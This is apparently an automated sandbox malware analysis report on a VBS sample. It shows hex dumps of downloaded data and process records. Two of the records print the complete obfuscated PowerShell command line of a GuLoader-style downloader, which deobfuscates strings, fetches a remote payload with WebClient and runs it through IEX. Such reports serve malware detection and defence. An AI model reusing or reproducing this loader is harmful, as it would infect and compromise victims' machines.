                                                                    2024-12-11 09:43:45 UTC508INData Raw: 37 64 31 30 0d 0a 0c d1 80 c4 61 1a 27 18 58 02 74 d2 ac e6 1e da c3 69 10 c5 99 f3 a2 a0 62 1a a4 55 51 9c 2c 3d 2b 08 66 a6 f0 6a 17 b8 b8 fb 61 0f 48 c7 75 ed 52 41 df ee a1 4b f5 e3 e6 f8 22 5c 2a 2c 5a e9 21 79 6c be 9d 54 e0 3b f6 28 c4 b3 23 24 e6 ff 4a 7c fa e8 dd b5 c5 3b 4c df 5a db 23 17 da f4 a4 76 5e 25 6a d3 77 ce ac 39 93 2b 35 cf dd 86 c8 3c db a2 6a 55 bf 5a af 9c 81 12 91 95 b8 3e f5 6b 3a 73 b3 83 48 88 16 55 15 bf fe ef f9 1f bb 3c a7 0e 3c ca 55 ed a3 d3 c3 b2 fa a2 e9 cd 87 d3 91 22 c2 72 f9 e6 03 01 9e ef 83 15 f3 f3 5b 9d e6 8c 7b 1a c6 13 c8 cc 61 f4 c7 2d d3 28 24 ab 4e a1 e7 7a 2a e0 43 4f 91 9c f5 e1 95 fb 19 20 02 18 e0 21 a1 26 9b 80 c7 56 5b 57 fe bb c1 50 23 45 db be f7 f0 9f c7 d1 79 8b 58 09 21 c2 c0 c2 1d 37 bf cb d1 d3
                                                                    Data Ascii: 7d10a'XtibUQ,=+fjaHuRAK"\*,Z!ylT;(#$J|;LZ#v^%jw9+5<jUZ>k:sHU<<U"r[{a-($Nz*CO !&V[WP#EyX!7
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: d7 b3 97 ad 72 1f 1f 0d ba f2 05 ba 1a 5d 0e 95 1a 73 9b b1 5d ff 4a fc a8 dd 63 a4 a8 c5 f3 5f 32 6c 51 89 34 1b bf 15 82 99 ee 8f ba f4 d6 7e c4 49 cd 65 b8 2c 66 c9 06 8f b0 c4 a5 f3 6c 63 2a a0 fb 79 87 58 fc 43 53 ab 0e ca 0b 9d 74 d6 2e b5 7a e1 a5 2d a7 7b 30 cc 9a 25 62 87 31 40 ce 72 d5 24 d7 61 24 21 5c b9 69 4f 33 86 89 34 0b 57 31 ed 8f 33 28 f9 86 6a 31 2c f4 a7 0a 9b 47 be d8 41 3a 58 df 47 6e 3d 4e 22 69 28 14 5e 0c 04 17 d8 da 91 38 7b 2e 77 68 c6 e9 17 10 b0 e5 7a bf d8 e4 32 2f 88 02 e2 12 85 fa ca 44 00 69 fd 57 a7 f7 73 5e 96 36 9b 5c ce db 79 4a 5a 57 79 ba ce 2d 77 88 cc d9 df a8 65 06 30 ec 31 bd f8 24 d0 7e 72 91 9c e4 ad 8d dd ae 8a ce 48 a8 34 98 15 f9 da 75 1f 0b 46 2c d8 b2 50 3d 14 27 bb 8e 5b cc dd b5 11 50 94 7c 7d fd bb 94
                                                                    Data Ascii: r]s]Jc_2lQ4~Ie,flc*yXCSt.z-{0%b1@r$a$!\iO34W13(j1,GA:XGn=N"i(^8{.whz2/DiWs^6\yJZWy-we01$~rH4uF,P='[P|}
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: b1 1e f7 aa ac 1d ac 43 2e 96 77 d3 2e 57 b9 f4 eb 8c 7e 85 a8 c8 5b 0a 8b 14 ce b0 46 45 0f 19 dc a5 a1 a2 31 bd f8 bb 3a 39 7c c2 1e c0 7a 51 a1 fe 0f 1a 60 5d 06 d4 74 3d df 09 08 bb 1b 7b 61 e9 3b b0 8a 9b 7a 5c 88 71 42 a0 93 93 76 16 b0 eb 7a ba 39 b0 54 21 a7 7b ed d8 d6 39 38 d3 6b 45 12 7d 58 35 cf 1f 7c 34 7a c0 43 2e af 98 4c d4 53 89 c8 3e f0 23 fb 10 fc dc 62 9b 08 40 6e 0d 6e 37 df ad ea 30 22 15 f8 ce 80 72 2f 37 6e e2 d2 b9 1d 1c b3 e9 a9 e6 f7 e1 e7 44 23 c3 ff 56 b5 f6 0a 6d da 79 e6 f7 56 b5 74 96 65 4f 30 59 6d 15 05 08 9b 0e a7 03 34 1e a0 86 6a 0e f2 4d c1 39 13 46 9d 6e b6 6e 04 e6 b8 e2 20 70 aa 07 95 ca b9 55 d9 c3 dd 10 bd 88 4b 12 88 d8 f0 e9 08 c1 ee 40 6a ee 21 85 1f 3e fe db 8f f1 09 25 27 bd 1f cc dd e8 2d 62 1e 28 ca 3b 2d
                                                                    Data Ascii: C.w.W~[FE1:9|zQ`]t={a;z\qBvz9T!{98kE}X5|4zC.LS>#b@nn70"r/7nD#VmyVteO0Ym4jM9Fnn pUK@j!>%'-b(;-
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: 0d 6b eb 7f 64 e0 d7 34 33 e8 ff f2 25 71 38 50 f9 e1 73 e4 94 55 db 23 4e 51 24 29 3a 7a 09 82 ec 78 ce ac 60 c3 a6 79 eb c9 6e 90 3a db a2 e7 19 9b 72 47 d6 87 12 99 19 f4 1a bb 9c c1 7b b3 37 cc 09 13 b5 fc cb 35 ce ad fa 9e 6b f7 96 61 a3 32 9f 4f 32 c7 59 9b cc 87 4a d0 f5 f3 47 6f 8c a8 28 23 68 f0 27 d0 5c a0 d3 bb 7e a6 51 55 17 cb f1 e7 ca 61 f4 4a a1 f7 f8 d8 82 f9 ed a0 37 f3 17 5a f3 13 2c 4d 68 ac 09 16 f1 ba d2 0c 69 12 f1 c7 ab d8 b5 53 58 27 b3 d8 d4 7c f7 7d 7d 23 f3 75 b0 8c 66 e7 ed 2f 29 67 15 a8 b1 ca f7 ed 53 36 40 3b f8 b8 ec 37 b1 62 1b 0b ae 58 3e 33 ee a1 c1 8e 40 b6 c0 a1 4d 94 1b 9b b8 37 ff ca d6 88 b4 46 e9 24 5f b7 51 61 8d e9 2c 09 bb 1d b0 5a 22 d5 dc de c7 73 d1 a4 83 7f 0d 2c 4b 72 4f ba 3b 4a 9a 89 04 da a3 43 be f7 f7
                                                                    Data Ascii: kd43%q8PsU#NQ$):zx`yn:rG{75ka2O2YJGo(#h'\~QUaJ7Z,MhiSX'|}}#uf/)gS6@;7bX>3@M7F$_Qa,Z"s,KrO;JC
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: 09 c4 e4 47 81 02 c9 fc f3 2b e1 ac 6c ac 22 de 14 0d 29 75 9a 46 cd 23 cf 68 13 2b 39 c7 7d 45 fb 9a 51 c3 de 52 d3 6f 67 46 3a 77 e7 c8 bb 96 86 69 23 c2 a0 7c 08 6c 47 81 8d 7b c1 a6 a5 38 3a 51 af 7c d3 b6 a7 b1 0d aa 32 14 b7 31 bc 9f 11 d6 e3 8a 29 ac 81 87 f2 be 3d 4f 4b c7 5c 55 68 be 97 1f 02 d0 48 02 45 ac 5d 4c 19 ea 6a 20 72 a7 42 f7 00 70 3b c8 3e 28 c6 9f 45 fe e8 e0 f2 e3 a2 8e 74 f2 17 0d 95 1a f8 b5 2a 92 3d 56 fc fe 56 da 89 3c c7 b3 5f b9 a2 b9 87 37 1b bf 9e 44 c7 2d a9 34 05 ca f1 c0 49 cd ee ec 08 6e 42 c8 b4 60 b3 ad a1 84 d3 29 a0 fb 92 8b a7 88 67 5f 80 f0 ec 86 c9 05 d6 2e eb a5 b6 a0 c5 f4 69 30 cc 11 8d 8e eb 33 44 ce 24 5e d5 5c 2d 00 29 b4 f9 6b 4f 33 0d 61 cb 7b 27 f7 c9 e9 52 5c c8 0d a4 d9 04 f0 a7 0a b5 80 ba d8 9b b0 a9
                                                                    Data Ascii: G+l")uF#h+9}EQRogF:wi#|lG{8:Q|21)=OK\UhHE]Lj rBp;>(Et*=VV<_7D-4InB`)g_.i03D$^\-)kO3a{'R\
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: d1 99 51 90 bc 5e 05 b5 0e dd df 6f 7a 51 bb 35 b9 02 05 db 63 f5 0e b5 76 69 45 b6 a0 ba fd fd 1e 23 f9 70 d0 04 25 ca 48 f4 72 26 b2 5c cc db 0a 37 ed e6 33 3e 22 4a 2c 13 b0 5c 87 b9 9f b4 0a d5 72 82 05 81 45 11 02 df b0 a1 03 1d 65 3b 74 6c 84 05 ec 49 85 04 69 bc 4c f7 09 a4 fc be 04 52 cf 65 42 d6 60 ff 2e 68 ed 2a de 8d fb c5 0e 9b eb 54 f6 b9 b4 7d 6b a1 e1 6a 1f d7 f5 af d9 fc 07 bf 96 c9 14 d9 f8 eb 85 30 38 76 dc f4 19 91 cd 3a 33 82 39 67 29 c4 67 45 cd 41 35 14 b1 af d7 3f 5f b1 e3 6f be 55 75 72 7a aa 63 57 5f ec 74 d1 dc 33 18 af f3 14 a1 42 39 2a d9 fd 94 60 3e f4 31 29 6c eb 59 96 18 2d b5 12 b7 35 9b 1f f6 40 eb 1c 7c 37 bb 6e a6 53 43 e0 f0 2e ed 83 92 3a 6e 57 1c 7c 36 18 2b ce b0 23 7b f8 4b 2f b5 ee 23 ff 86 7a ab 8d 51 ad 5d 80 4a
                                                                    Data Ascii: Q^ozQ5cviE#p%Hr&\73>"J,\rEe;tlIiLReB`.h*T}kj08v:39g)gEA5?_oUurzcW_t3B9*`>1)lY-5@|7nSC.:nW|6+#{K/#zQ]J
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: e6 9b 4d 15 c7 98 50 b9 c3 dd d8 c8 29 b8 4a f6 8f 55 54 2e d2 d4 de fe 90 7c 17 bd d1 03 b7 03 91 78 fe b5 3e f9 08 8b c5 d1 05 ce aa 44 24 5c a2 5f 2d 72 b5 57 ba c5 17 6e 62 f6 a5 a6 6d a6 b0 e3 12 2a bf 40 81 4c d3 4a cd 56 ee 33 e7 3e 1e 8d 3e e9 aa 52 1b 40 7f 95 d6 f2 07 45 44 97 0c b6 21 e6 51 4f e7 4f 76 65 18 28 ec 2d 9a 79 48 6f 52 92 84 df f8 be 9e df 26 65 31 79 95 4c a8 ff e2 17 34 75 fa e8 65 e1 f8 7c 0c 86 98 df 23 42 51 18 f2 89 2b 2d e1 22 9f 72 40 c6 6c 72 65 30 a8 8e 43 f2 33 10 63 55 bf d1 69 c2 dc d0 9d 94 ed b5 17 25 46 38 4f 37 be 30 cb 12 61 fb db 68 a4 77 d2 16 de b7 8d f3 b9 6e 2a 45 e1 d1 9b 47 41 fc 31 f7 f3 16 b3 55 db 03 da 80 b9 36 38 a5 2b bf 12 e6 b9 01 5a 90 58 19 ec cc 32 a2 4c e2 3b 55 2f 7d 06 8e 87 b9 3c 42 70 44 5c
                                                                    Data Ascii: MP)JUT.|x>D$\_-rWnbm*@LJV3>>R@ED!QOOve(-yHoR&e1yL4ue|#BQ+-"r@lre0C3cUi%F8O70ahwn*EGA1U68+ZX2L;U/}<BpD\
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: 39 49 f1 ea 22 7b 69 b9 d6 ec 02 37 b0 cc 72 3b 31 74 0c e2 2b 3b 89 e8 c6 8b 48 ae 95 f2 5e 3a 5f 70 4f cf 4c 6d 3d af d4 3a fe 87 c5 4f 6c a9 94 12 af 88 50 c3 5c e8 73 fb 1c b9 e1 e5 83 67 41 06 0e 28 04 2d 7c 4f fd a7 81 85 35 95 d8 f5 0b 08 b6 66 f4 44 97 00 84 3b 38 9c a3 0a 0d f2 12 6b 82 7d 22 4b 80 4a e4 91 b0 d7 9e 6b ab 38 56 20 b0 75 67 b8 0f c8 1e fb 3b e4 fc 39 c4 40 36 22 49 ba e1 89 85 07 0c 63 14 2d 61 08 82 74 d4 a9 28 a5 2f 89 c5 81 9e d5 6f e8 c8 45 82 87 e4 67 ad 38 a3 7f cc 2c 9d 4c 6d 9a c3 16 d7 5b d2 1d 08 74 93 c9 54 30 c7 59 d5 fa f4 23 f1 11 7a 34 70 45 ab 46 8e 12 e9 3e a5 1c 45 6f a4 81 f9 aa ad 19 11 3f 7d 06 36 05 53 30 e8 74 71 01 d2 a2 5b b8 d7 a4 10 0f ec 9a e3 76 4d 03 f4 04 c9 c5 5c 7c 7f 3b 81 e0 e0 52 e4 a9 58 78 1e
                                                                    Data Ascii: 9I"{i7r;1t+;H^:_pOLm=:OlP\sgA(-|O5fD;8k}"KJk8V ug;9@6"Ic-at(/oEg8,Lm[tT0Y#z4pEF>Eo?}6S0tq[vM\|;RXx
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: 14 ea b1 54 df e7 e5 2d 85 1f 5a bf ea ff 83 ae 47 8b b9 84 66 86 8e 70 45 47 ce 24 82 af 2d ea d5 ca 4d 32 a7 a7 4c 75 56 cb 80 e7 f7 f3 ee 52 5c 1b 40 72 0a 50 80 4c 55 b5 81 35 94 e9 3f db 15 dc ea c4 b1 dd 96 57 99 5a 05 0b 50 1a 19 12 94 77 7d 62 10 29 61 8b 17 5d 1a 85 58 5d 6f ff a4 fb 15 6b 66 af ea 22 c9 09 90 02 dc eb d3 6f 75 50 0d 5a 53 4c 7b 79 0a 5a dc fa 80 eb d3 39 e5 45 9d fb 2c 78 8d fd 04 f2 42 07 db 17 b3 f9 61 8a ce 40 72 22 23 c4 cf c1 ec 10 80 44 72 12 dd 5c f0 f9 fd 23 93 18 72 fe 5c ab 87 13 d8 22 c1 85 77 7c 8d a0 02 44 17 76 a1 eb 8e b0 29 f4 b2 84 04 5b 50 ef 82 dd ae c2 5c 70 05 67 34 c5 95 c5 99 ad 08 7d e4 47 ee 30 c1 d4 a9 92 93 30 a9 99 38 45 17 29 06 ea 6a c2 44 63 ca de bd 68 e8 85 0e e1 e0 82 c5 39 8c 7b 50 10 9b 32 39
                                                                    Data Ascii: T-ZGfpEG$-M2LuVR\@rPLU5?WZPw}b)a]X]okf"ouPZSL{yZ9E,xBa@r"#Dr\#r\"w|Dv)[P\pg4}G008E)jDch9{P29
                                                                    2024-12-11 09:43:45 UTC1369INData Raw: 27 d7 81 f1 9d 3d 29 6c c7 96 1e ac 5e e7 73 08 4d 25 e4 f0 41 c0 d2 b0 79 b3 b5 ea 95 75 b0 2b 2a 95 7d e4 f8 ae ca d6 b7 56 ca 17 ed 37 14 b5 be 4f 4c 67 57 23 75 05 fd ab 73 54 ad 5d 5c 52 46 6d 3b d6 41 58 67 9a 2e 5f 07 8c 54 ef 7e 10 7f fd 4f 40 cb d3 09 5c a6 c7 17 f2 d4 ee e2 7a 75 e8 5c ae e7 d9 98 7c a5 f0 0c 1f 97 e8 fa 35 35 0a 00 cc dc 5d 05 c5 2d 5f 90 79 02 b5 1a 2c 9d 54 1a 30 ce a2 74 19 8c 4d 14 75 af a4 fc de fd 28 8c 1f 55 77 6e 87 77 09 0b a1 4f c1 ed 89 ae 74 c7 12 67 38 27 db 67 52 a6 e8 cf dd d7 75 2d c4 6a 0a b1 77 ee 3a a6 b3 e3 7c 22 bf 40 5c e8 f8 af 6c 40 14 86 93 0a a3 26 d7 6a 4e f5 c6 f1 d0 db c0 3d 07 52 06 56 fb c2 ba 92 f1 a3 c4 06 7a ee 78 4d 43 e5 7d d6 f9 cb d8 5c 6c a0 10 a6 15 98 88 d3 cc 6f c4 5b 9e 3d 19 00 71 90
                                                                    Data Ascii: '=)l^sM%Ayu+*}V7OLgW#usT]\RFm;AXg._T~O@\zu\|55]-_y,T0tMu(UwnwOtg8'gRu-jw:|"@\l@&jN=RVzxMC}\lo[=q


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:04:42:58
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs"
                                                                    Imagebase:0x7ff79d680000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:04:42:58
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2191640831.00000292999FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:04:42:58
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:04:43:10
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod 